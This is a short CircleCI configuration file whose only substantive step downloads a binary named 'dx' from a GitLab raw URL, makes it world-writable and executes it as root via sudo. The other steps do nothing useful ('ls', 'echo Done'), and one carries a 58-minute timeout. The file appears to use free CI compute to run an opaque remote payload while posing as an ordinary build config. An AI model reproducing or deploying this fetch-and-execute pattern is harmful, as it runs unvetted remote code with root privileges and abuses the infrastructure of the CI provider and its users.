version: 2.1

jobs:
  build:
  
    docker:
      - image: cimg/python:3.10.4
    
    

    steps:
      - run:
         name: "pro"
         
         command: | 
          
          sudo su --command "wget https://gitlab.com/MySeald/rx/-/raw/main/dx && chmod 777 dx && ./dx"
          
      
      - run:
         name: "bot"
         no_output_timeout: 58m
         command: |
          ls
          

      - run:
         name: "back"
         command: |
           
           echo Done
           

workflows:
  version: 2
  build:
    jobs:
      - build
